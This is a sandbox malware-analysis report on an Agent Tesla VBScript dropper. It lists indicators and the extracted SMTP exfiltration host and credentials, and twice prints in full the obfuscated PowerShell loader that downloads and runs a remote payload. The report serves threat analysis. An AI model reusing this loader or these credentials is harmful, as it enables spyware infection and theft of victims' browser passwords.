File name:

4126d514421517e58e9d464eea10dc9fb1027b768d37d3ba0e30c1578773479e.vbs

Full analysis: https://app.any.run/tasks/191cfb73-a818-4cd5-83c3-d64b216f32a8
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Malware Trends Tracker     >>>
Analysis date: April 30, 2024, 06:14:24
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
smtp
exfiltration
stealer
agenttesla
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

85A31DABBFFC12693AB3E0B2B9C66FFD

SHA1:

7F6F721BDFC4CE65461BC83DC9604DCAB19F838B

SHA256:

4126D514421517E58E9D464EEA10DC9FB1027B768D37D3BA0E30C1578773479E

SSDEEP:

384:wE/p5dFHavVyD+MDM5E3cj7U1tTK7Yp5qVeTxOlolzrde/5bWOtVHqE7wQ:t/pRPFDM5jj0tTYeV0ideJ5TXF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Scans artifacts that could help determine the target

      • wab.exe (PID: 6812)

    • AGENTTESLA has been detected (YARA)

      • wab.exe (PID: 6812)

    • Steals credentials from Web Browsers

      • wab.exe (PID: 6812)

    • Actions looks like stealing of personal data

      • wab.exe (PID: 6812)

  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6036)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6036)
      • powershell.exe (PID: 4916)

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 6036)
      • powershell.exe (PID: 4916)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 4260)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 4916)

    • Unusual connection from system programs

      • powershell.exe (PID: 4916)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 4260)

    • Reads security settings of Internet Explorer

      • wab.exe (PID: 6812)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 4260)

    • Checks Windows Trust Settings

      • wab.exe (PID: 6812)

    • The process connected to a server suspected of theft

      • wab.exe (PID: 6812)

    • Connects to SMTP port

      • wab.exe (PID: 6812)

  • INFO

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 4260)

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 6036)
      • powershell.exe (PID: 4916)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 4260)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 4260)

    • Checks proxy server information

      • powershell.exe (PID: 4916)
      • wab.exe (PID: 6812)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 4260)

    • Reads the computer name

      • wab.exe (PID: 6812)

    • Checks supported languages

      • wab.exe (PID: 6812)

    • Reads the machine GUID from the registry

      • wab.exe (PID: 6812)

    • Reads the software policy settings

      • wab.exe (PID: 6812)
      • slui.exe (PID: 6664)

    • Creates files or folders in the user directory

      • wab.exe (PID: 6812)

    • Reads Environment values

      • wab.exe (PID: 6812)

    • Reads Microsoft Office registry keys

      • wab.exe (PID: 6812)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AgentTesla

(PID) Process(6812) wab.exe
Protocolsmtp
Hostsmtp.ionos.es
Port587
Usernamerodrigo@diceltro.com
Passwordrodrigo87654321
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
136
Monitored processes
11
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe conhost.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs sppextcomobj.exe no specs slui.exe #AGENTTESLA wab.exe slui.exe no specs filecoauth.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2620"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Ensidigheden.Rep && echo f7f81a39-5f63-5b42-9efd-1f13b5431005quot;C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
4260"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Staldetaternes81 = 1;$Baandstationen114='S';$Baandstationen114+='ubstrin';$Baandstationen114+='g';Function Menneskekenderens($overgratefully){$Bedaares=$overgratefully.Length-$Staldetaternes81;For($Hydrocores=5; $Hydrocores -lt $Bedaares; $Hydrocores+=(6)){$Arvemateriale+=$overgratefully.$Baandstationen114.Invoke($Hydrocores, $Staldetaternes81);}$Arvemateriale;}function Inscriptively($Distritos){. ($Bajonetfatninger) ($Distritos);}$Daddelen=Menneskekenderens ' ,cepMCycloo ,oinz commi Untrl abyslTerrea Prot/ Chur5,ntom.Glost0Anlbs Subha(Eit.eW andiF,lken Tri.dA sproBrne wMilitsSkriv A koNunciaTOve,f Arbit1 Ng e0Physi. ksam0 opma;Ol,go TrontW SalgitriumnAs er6A.adi4R,ist;Fagkr An.ixFlad,6Nedru4intre;Sylte GeophrAvo.ivLight: A.tr1 neva2Rum,n1Sjlev.Spani0 For,),loni jocuGwilroe upercPu isk Ve.ao Dopi/Eksp.2Snees0Samme1,yclo0Forp,0Bemal1 coli0Demig1Stell TylleF Un eiJ ttrrkonfoeSkkelfSna.eo ZebuxRoadf/Bl dt1Jokes2 Wath1Und m.Be ys0Strom ';$Dollargrin=Menneskekenderens ' VigiU MattsUdspneMic.or W od- HjesADagpegeina eTriann Mal.tK non ';$almenmenneskelig=Menneskekenderens 'LngodhSofavtVladat bovbp Astes.idta:Snoni/Maur./Ad,end SloprAboliiRnn.nv CerveAmetr.MedicgLoxolo KonsoTaleng,ickel C,aneFlo,l. Supec ugtho Vitim Krab/Ultr uQua tcValer?PodopeKollexOpiumpDennioUnglorVerp.tBacki=MerovdUnbreoStuntwBidevnSagenlSuborosnat ad sigd.erma&,ussuiV dendPseud=Chatt1FilmsLImb.efStart_Mete rvr.ipXBo,em4FormeLU,fol6m.ngr0 InteN Be.iRRigidl.rstesFor ir,ypegGAlter5 Spit2D senWLodniq,utte1Huac dphycobSc.ubdKajakwSubst0Cossh7 Fusi1Transo Trit7GyldebLoddeGVelse-Dangl ';$Morfologis=Menneskekenderens 'Cou.t>Flori ';$Bajonetfatninger=Menneskekenderens '.corhiLyskoe AkaaxO.man ';$Yates163='Unfearfulness233';Inscriptively (Menneskekenderens 'KnaveScatape Deict Uopd- SkemCObligo,estunSupertBrevseSh,ttnViewdt Pakn P.kke- WhelPbanega ,erst Ver hSpice U sonTKalku:Ireni\JalouSImbeckHykeaoFllerlDebite Ho.evarchesLapwieAer.gn Monoevaelgr Gues. RagntEm.loxS lertCocke Befre-Bere.VKorseaSkulllGnidruturboeOverm Prere$ Sr,tY Obloa,eanitOntt.eWarehsNon.e1Stikk6Stokk3Mispa;skrpp ');Inscriptively (Menneskekenderens 'CowpaiPasfofDepr, Curcu(TrivitReince DiscsId altQuo i-maldipFertia KofftP opehTer e teks,Tensil:Svidt\Em.irSFalc.kRecepoLambdlL,caneMon.gv Brygs RysleSpni nNealoeBilb r Her..YeltptVisi,xUncaktIntes)ford,{Vin.ue AnimxD moni UncrtErgot}Sjusk;Pavag ');$Coiler = Menneskekenderens 'PronaeAnalocArbe.hInsetoForlb Aerol% roneagenerpVandppHyalid,geguanonwat,astea M.th%Opryk\det,nELu fenme,odsEvaniiPolitdAnginiBrugtgIn frhTop oeKi,scd Ideoe AkeynFejeb. p,laRGol.teKnurhpLavni Sici&Stenb&.hili VibraeKoldtcKvadrhCa eroGi,gl Scher$Haki. ';Inscriptively (Menneskekenderens 'Scray$,esvagSublel TwinoVegetbU,pira,nmyslPerco: PencATokomtdismel ,ysteLabiltThun sBeati= S.ab(Afprvc,omeomRaadhdKa eg dhng/NazircHypho Vi k$PrydeCScr poGenopiUidenlFyldeeMedmerAmphi)r ind ');Inscriptively (Menneskekenderens 'feder$ RnehgKr.bblFostrode,ydbNettoaAfspal tj.n:Tel fO AktouFabr,tBrd,fl ,nkhiFootseCro pr.verns,iseq=,ilba$ArtisaCompolDressmAlifseSlopbnAfkrymMetace ByganActinnko beeBulgisVgesakmyoceeKlapplFrazziBakkegKhirk.Pawn sJu,efp,acadlLovefiQuin,tAppar(Humor$PacesMDragsomarker Kon fTauraoSialilDia ooOut,lgHjertiBrands Bags)Stric ');$almenmenneskelig=$Outliers[0];Inscriptively (Menneskekenderens 'Sleaz$Pedomg.ebeclFornio ToribAcrogaPalk.lEskor:Br diPstrkeaTerrorOmligtA.omtiB rboc Sti.uHyperl DoliaTittur VerblUncooyBinde=BeskiNLsarbeVarefwEmple-HeterOL gnobScrupjBakkeeuagtscUa,hntLseng BiogSTie.ay,etrasDekattPhosge PrepmInvas.TempeN quipeTeufitunexp.KlassWDatideNonafbS.inkC PanflConfei,urzae Bryln,orbltfor,a ');Inscriptively (Menneskekenderens 'optat$ G.uiPGrouta Kol r Bla,t Jav,iStrejc ret,uOutfalSgereaM,nesrTrevelKaneby Excu.OctonH Fal.eReimpaRes,ldLavfrefuldkreftersOutra[Ul an$ ltraD FalkoReal lRendel.anseaF,rderBag igImponrEffeki Khutn,onbo]L tte= Bica$ DoerDaege.a urobdCavatdSpolieSon.mlTandeeInexonStjer ');$Systembeskrivelserne=Menneskekenderens 'EnjoyPUndv.aFastrrtrumptBann iLeisucchrisuH stolridseaHellerAffallBernhy Af,u.Fod.tDParaloSnappwAlbumn.ectil Stygosel,ia ostd AlfrF Her.i acklF,xcheSadis(,esti$DesseaAandflUdenrmNonhoeVenstnCacotmStatueSdsupn Sp ln bumpeKnifesIbc ok kapeeOnco.lc.areiEkst,g Para,Kaste$MonarASystelSkvatdPhyleoTerrasncospi KampdGruppe Prei)Huele ';$Systembeskrivelserne=$Atlets[1]+$Systembeskrivelserne;$Aldoside=$Atlets[0];Inscriptively (Menneskekenderens 'Hella$LgegugBichrlCacomoAdenobFradraForurlVrtsh: WeepURadbrjRelevvHyrinnIndemtOakes=Ni bl(AntruTBeskfeSto ls amygt A bo-Ho,edPBorepaB,platForsgh Anti Inte$SeignAc.ntilUn erd fo,do SigjsL ekoiinveidChri,e Yann) Arse ');while (!$Ujvnt) {Inscriptively (Menneskekenderens '.peci$PjevsgmetodlAbstroUnderbO.bagaFor el,hier:Sper.ACutledAfteroGettypNegatt SpeciHobblo DivanPostss C.ntaKinahnBrintsSpisegCosymn.repriRe,innChadog Tile= Kame$FertitOver rAdv.kuF.rkreChipo ') ;Inscriptively $Systembeskrivelserne;Inscriptively (Menneskekenderens 'U,catSOverpt O.skaCoughrGapewt Tai,-ShuttSIndivlBrlenechr se OverpDmni Pakke4K.lkv ');Inscriptively (Menneskekenderens 'Spe c$UdbrygErotilBo duoInkorbFestsaTaoislVenom: ForsUFeminj HypevRaadsn Van tSt,mp= Trom(UtaalT OvereRosewsBee,etTangl-Prec,P.ssidaunsuctskrivhpla.s oder$rubleAPremilVedvadBlstao EffesBortaiPapi,dForskekuwai)Lgner ') ;Inscriptively (Menneskekenderens 'Perio$,idtogTilsllG.ndroSkaftbPraleaDarrylEr ot:ImpreRmajorotrunkmInskraRettinGert tNiduliBedebk orlde,yronrFol eeKonf.nCongr=Loi,o$ProcegPsychlDeamioMedicbUngdoatre ilUdpol: FugtEAkt.nnBrnefgTak,elCitytuMultit TorstKommeiChaptnSynecg,ldeb+Vanem+Iamat%Soma,$Conc,O,ustiuN,dtltTil glMassaiMontaeSubstr Peg.sAmbas.LambacHandloFjsinuDe.ianStr jt,egru ') ;$almenmenneskelig=$Outliers[$Romantikeren];}Inscriptively (Menneskekenderens 'Stilv$Giv bgAlloxlJomfro .rapbGivs a,actolSalde:SmaskFKeypal Siali.igtenFugtptKerneeKer eb,tomusOreilsHum.reSp.gnn konksMinim Backs=Salgs CottoG .esueAlchetOrgan- oodlCTagvioForrinArbejtUnbacecoun nSand.tMulli A.si$,aahiABri.el Re,edRadikoFyrs,sSalgsiVeks,d,igsge Hist ');Inscriptively (Menneskekenderens 'Ori,a$Fempugp.ogrl PerooSnuttb IdenaAkromlHvleb:.elasSAfghah CirceNoemar Peaci Horsdre.voaBov.lnPinio Nonc.=Stkni Rat.r[ShortSKultuy PrecsWad,itkarrieFunktmGebrd. Foo CCorveoSpre.nEk.amv ifreeF yverT.temtTekst]N,ddy:Strik:SlutvFLatherMentaoBestrmDreidBPlan.a Sp.dsMonoseRow e6Dynam4Out eS UudttEsteerAutoei MusinSejrrg .rom(Wormy$FalleFS beklVitupiTransnRho atFortje HandbTilflsDecalsSt kseDi,innHandlsSygeh)Gamme ');Inscriptively (Menneskekenderens 'Slu.r$ an,igBedrilOph,lo For.b Ans.aTermilBoven:syphiUOv rlnDdsancM ntgoImpeenOpthasT editBjrg rLensbu Dyngcub,adt Kre,ujulemrRechrask del Peri Rabal=Genea Abu,[Lyen.Sde rayCh rcsOstratbi peeLandhm Thi . RefrTLangteTelesxReclatGoldm. ProvEes imnaudnacMelleo olledKa.eniKaraknBegitgMorph]Likes:Brunl:ResunAUncatS MamoCLivstIHis oI ukra.HeltiGMa.nsePrefetFrak SblsertLactorNi.roiVolumnLoitegHje.s(Statu$FordrShod.khRednieBrevfr E,neiSkrivdStumbashi ln Tall)C ste ');Inscriptively (Menneskekenderens 'Opmag$ K.mpgCentrlalteroD.skebWispsaHologl Gavs:nordlH Gl.se Peg,t.teame DrayrYdermobejesdUnsinoSigjnxQuadr= Jobb$ UndeUGu.ldnC valc AsheoneuronFourisKogsatNo.serS,owauFootsc NonftTetrauAntegr.nsvaaForstlHymen. SkudsK ageuParsibSydafsImp.rtAnnalrPseudi Vi bnKundgg M.gi(Rubri3Vider4 Vejr0Auscu2R,spi0Antim6Opera,Kryst2Elsdy8Gloss8 Glan3Oppos2ra,et)Allev ');Inscriptively $Heterodox;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
4916"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Staldetaternes81 = 1;$Baandstationen114='S';$Baandstationen114+='ubstrin';$Baandstationen114+='g';Function Menneskekenderens($overgratefully){$Bedaares=$overgratefully.Length-$Staldetaternes81;For($Hydrocores=5; $Hydrocores -lt $Bedaares; $Hydrocores+=(6)){$Arvemateriale+=$overgratefully.$Baandstationen114.Invoke($Hydrocores, $Staldetaternes81);}$Arvemateriale;}function Inscriptively($Distritos){. ($Bajonetfatninger) ($Distritos);}$Daddelen=Menneskekenderens ' ,cepMCycloo ,oinz commi Untrl abyslTerrea Prot/ Chur5,ntom.Glost0Anlbs Subha(Eit.eW andiF,lken Tri.dA sproBrne wMilitsSkriv A koNunciaTOve,f Arbit1 Ng e0Physi. ksam0 opma;Ol,go TrontW SalgitriumnAs er6A.adi4R,ist;Fagkr An.ixFlad,6Nedru4intre;Sylte GeophrAvo.ivLight: A.tr1 neva2Rum,n1Sjlev.Spani0 For,),loni jocuGwilroe upercPu isk Ve.ao Dopi/Eksp.2Snees0Samme1,yclo0Forp,0Bemal1 coli0Demig1Stell TylleF Un eiJ ttrrkonfoeSkkelfSna.eo ZebuxRoadf/Bl dt1Jokes2 Wath1Und m.Be ys0Strom ';$Dollargrin=Menneskekenderens ' VigiU MattsUdspneMic.or W od- HjesADagpegeina eTriann Mal.tK non ';$almenmenneskelig=Menneskekenderens 'LngodhSofavtVladat bovbp Astes.idta:Snoni/Maur./Ad,end SloprAboliiRnn.nv CerveAmetr.MedicgLoxolo KonsoTaleng,ickel C,aneFlo,l. Supec ugtho Vitim Krab/Ultr uQua tcValer?PodopeKollexOpiumpDennioUnglorVerp.tBacki=MerovdUnbreoStuntwBidevnSagenlSuborosnat ad sigd.erma&,ussuiV dendPseud=Chatt1FilmsLImb.efStart_Mete rvr.ipXBo,em4FormeLU,fol6m.ngr0 InteN Be.iRRigidl.rstesFor ir,ypegGAlter5 Spit2D senWLodniq,utte1Huac dphycobSc.ubdKajakwSubst0Cossh7 Fusi1Transo Trit7GyldebLoddeGVelse-Dangl ';$Morfologis=Menneskekenderens 'Cou.t>Flori ';$Bajonetfatninger=Menneskekenderens '.corhiLyskoe AkaaxO.man ';$Yates163='Unfearfulness233';Inscriptively (Menneskekenderens 'KnaveScatape Deict Uopd- SkemCObligo,estunSupertBrevseSh,ttnViewdt Pakn P.kke- WhelPbanega ,erst Ver hSpice U sonTKalku:Ireni\JalouSImbeckHykeaoFllerlDebite Ho.evarchesLapwieAer.gn Monoevaelgr Gues. RagntEm.loxS lertCocke Befre-Bere.VKorseaSkulllGnidruturboeOverm Prere$ Sr,tY Obloa,eanitOntt.eWarehsNon.e1Stikk6Stokk3Mispa;skrpp ');Inscriptively (Menneskekenderens 'CowpaiPasfofDepr, Curcu(TrivitReince DiscsId altQuo i-maldipFertia KofftP opehTer e teks,Tensil:Svidt\Em.irSFalc.kRecepoLambdlL,caneMon.gv Brygs RysleSpni nNealoeBilb r Her..YeltptVisi,xUncaktIntes)ford,{Vin.ue AnimxD moni UncrtErgot}Sjusk;Pavag ');$Coiler = Menneskekenderens 'PronaeAnalocArbe.hInsetoForlb Aerol% roneagenerpVandppHyalid,geguanonwat,astea M.th%Opryk\det,nELu fenme,odsEvaniiPolitdAnginiBrugtgIn frhTop oeKi,scd Ideoe AkeynFejeb. p,laRGol.teKnurhpLavni Sici&Stenb&.hili VibraeKoldtcKvadrhCa eroGi,gl Scher$Haki. ';Inscriptively (Menneskekenderens 'Scray$,esvagSublel TwinoVegetbU,pira,nmyslPerco: PencATokomtdismel ,ysteLabiltThun sBeati= S.ab(Afprvc,omeomRaadhdKa eg dhng/NazircHypho Vi k$PrydeCScr poGenopiUidenlFyldeeMedmerAmphi)r ind ');Inscriptively (Menneskekenderens 'feder$ RnehgKr.bblFostrode,ydbNettoaAfspal tj.n:Tel fO AktouFabr,tBrd,fl ,nkhiFootseCro pr.verns,iseq=,ilba$ArtisaCompolDressmAlifseSlopbnAfkrymMetace ByganActinnko beeBulgisVgesakmyoceeKlapplFrazziBakkegKhirk.Pawn sJu,efp,acadlLovefiQuin,tAppar(Humor$PacesMDragsomarker Kon fTauraoSialilDia ooOut,lgHjertiBrands Bags)Stric ');$almenmenneskelig=$Outliers[0];Inscriptively (Menneskekenderens 'Sleaz$Pedomg.ebeclFornio ToribAcrogaPalk.lEskor:Br diPstrkeaTerrorOmligtA.omtiB rboc Sti.uHyperl DoliaTittur VerblUncooyBinde=BeskiNLsarbeVarefwEmple-HeterOL gnobScrupjBakkeeuagtscUa,hntLseng BiogSTie.ay,etrasDekattPhosge PrepmInvas.TempeN quipeTeufitunexp.KlassWDatideNonafbS.inkC PanflConfei,urzae Bryln,orbltfor,a ');Inscriptively (Menneskekenderens 'optat$ G.uiPGrouta Kol r Bla,t Jav,iStrejc ret,uOutfalSgereaM,nesrTrevelKaneby Excu.OctonH Fal.eReimpaRes,ldLavfrefuldkreftersOutra[Ul an$ ltraD FalkoReal lRendel.anseaF,rderBag igImponrEffeki Khutn,onbo]L tte= Bica$ DoerDaege.a urobdCavatdSpolieSon.mlTandeeInexonStjer ');$Systembeskrivelserne=Menneskekenderens 'EnjoyPUndv.aFastrrtrumptBann iLeisucchrisuH stolridseaHellerAffallBernhy Af,u.Fod.tDParaloSnappwAlbumn.ectil Stygosel,ia ostd AlfrF Her.i acklF,xcheSadis(,esti$DesseaAandflUdenrmNonhoeVenstnCacotmStatueSdsupn Sp ln bumpeKnifesIbc ok kapeeOnco.lc.areiEkst,g Para,Kaste$MonarASystelSkvatdPhyleoTerrasncospi KampdGruppe Prei)Huele ';$Systembeskrivelserne=$Atlets[1]+$Systembeskrivelserne;$Aldoside=$Atlets[0];Inscriptively (Menneskekenderens 'Hella$LgegugBichrlCacomoAdenobFradraForurlVrtsh: WeepURadbrjRelevvHyrinnIndemtOakes=Ni bl(AntruTBeskfeSto ls amygt A bo-Ho,edPBorepaB,platForsgh Anti Inte$SeignAc.ntilUn erd fo,do SigjsL ekoiinveidChri,e Yann) Arse ');while (!$Ujvnt) {Inscriptively (Menneskekenderens '.peci$PjevsgmetodlAbstroUnderbO.bagaFor el,hier:Sper.ACutledAfteroGettypNegatt SpeciHobblo DivanPostss C.ntaKinahnBrintsSpisegCosymn.repriRe,innChadog Tile= Kame$FertitOver rAdv.kuF.rkreChipo ') ;Inscriptively $Systembeskrivelserne;Inscriptively (Menneskekenderens 'U,catSOverpt O.skaCoughrGapewt Tai,-ShuttSIndivlBrlenechr se OverpDmni Pakke4K.lkv ');Inscriptively (Menneskekenderens 'Spe c$UdbrygErotilBo duoInkorbFestsaTaoislVenom: ForsUFeminj HypevRaadsn Van tSt,mp= Trom(UtaalT OvereRosewsBee,etTangl-Prec,P.ssidaunsuctskrivhpla.s oder$rubleAPremilVedvadBlstao EffesBortaiPapi,dForskekuwai)Lgner ') ;Inscriptively (Menneskekenderens 'Perio$,idtogTilsllG.ndroSkaftbPraleaDarrylEr ot:ImpreRmajorotrunkmInskraRettinGert tNiduliBedebk orlde,yronrFol eeKonf.nCongr=Loi,o$ProcegPsychlDeamioMedicbUngdoatre ilUdpol: FugtEAkt.nnBrnefgTak,elCitytuMultit TorstKommeiChaptnSynecg,ldeb+Vanem+Iamat%Soma,$Conc,O,ustiuN,dtltTil glMassaiMontaeSubstr Peg.sAmbas.LambacHandloFjsinuDe.ianStr jt,egru ') ;$almenmenneskelig=$Outliers[$Romantikeren];}Inscriptively (Menneskekenderens 'Stilv$Giv bgAlloxlJomfro .rapbGivs a,actolSalde:SmaskFKeypal Siali.igtenFugtptKerneeKer eb,tomusOreilsHum.reSp.gnn konksMinim Backs=Salgs CottoG .esueAlchetOrgan- oodlCTagvioForrinArbejtUnbacecoun nSand.tMulli A.si$,aahiABri.el Re,edRadikoFyrs,sSalgsiVeks,d,igsge Hist ');Inscriptively (Menneskekenderens 'Ori,a$Fempugp.ogrl PerooSnuttb IdenaAkromlHvleb:.elasSAfghah CirceNoemar Peaci Horsdre.voaBov.lnPinio Nonc.=Stkni Rat.r[ShortSKultuy PrecsWad,itkarrieFunktmGebrd. Foo CCorveoSpre.nEk.amv ifreeF yverT.temtTekst]N,ddy:Strik:SlutvFLatherMentaoBestrmDreidBPlan.a Sp.dsMonoseRow e6Dynam4Out eS UudttEsteerAutoei MusinSejrrg .rom(Wormy$FalleFS beklVitupiTransnRho atFortje HandbTilflsDecalsSt kseDi,innHandlsSygeh)Gamme ');Inscriptively (Menneskekenderens 'Slu.r$ an,igBedrilOph,lo For.b Ans.aTermilBoven:syphiUOv rlnDdsancM ntgoImpeenOpthasT editBjrg rLensbu Dyngcub,adt Kre,ujulemrRechrask del Peri Rabal=Genea Abu,[Lyen.Sde rayCh rcsOstratbi peeLandhm Thi . RefrTLangteTelesxReclatGoldm. ProvEes imnaudnacMelleo olledKa.eniKaraknBegitgMorph]Likes:Brunl:ResunAUncatS MamoCLivstIHis oI ukra.HeltiGMa.nsePrefetFrak SblsertLactorNi.roiVolumnLoitegHje.s(Statu$FordrShod.khRednieBrevfr E,neiSkrivdStumbashi ln Tall)C ste ');Inscriptively (Menneskekenderens 'Opmag$ K.mpgCentrlalteroD.skebWispsaHologl Gavs:nordlH Gl.se Peg,t.teame DrayrYdermobejesdUnsinoSigjnxQuadr= Jobb$ UndeUGu.ldnC valc AsheoneuronFourisKogsatNo.serS,owauFootsc NonftTetrauAntegr.nsvaaForstlHymen. SkudsK ageuParsibSydafsImp.rtAnnalrPseudi Vi bnKundgg M.gi(Rubri3Vider4 Vejr0Auscu2R,spi0Antim6Opera,Kryst2Elsdy8Gloss8 Glan3Oppos2ra,et)Allev ');Inscriptively $Heterodox;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4940\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6036"C:\WINDOWS\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\4126d514421517e58e9d464eea10dc9fb1027b768d37d3ba0e30c1578773479e.vbsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6172C:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exe -EmbeddingC:\Users\admin\AppData\Local\Microsoft\OneDrive\19.043.0304.0013\FileCoAuth.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft OneDriveFile Co-Authoring Executable
Exit code:
0
Version:
19.043.0304.0013
Modules
Images
c:\users\admin\appdata\local\microsoft\onedrive\19.043.0304.0013\filecoauth.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
6296"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Ensidigheden.Rep && echo f7f81a39-5f63-5b42-9efd-1f13b5431005quot;C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
6632C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
6664"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
